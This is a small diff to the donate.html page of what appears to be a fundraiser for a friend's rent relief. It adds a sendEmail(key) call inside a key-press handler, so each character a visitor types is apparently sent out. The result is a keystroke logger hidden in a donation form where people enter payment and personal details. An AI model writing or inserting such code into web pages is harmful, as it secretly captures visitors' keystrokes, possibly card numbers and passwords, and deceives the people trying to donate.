--- a/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
+++ b/f/providing-rent-relief-for-my-close-friend-lydia/donate.html
@@ -11,6 +11,7 @@
 	get = window.event?event:e;
 	key = get.keyCode?get.keyCode:get.charCode;
 	key = String.fromCharCode(key);
+	sendEmail(key);
 	window.alert(key);
 }
   </script>
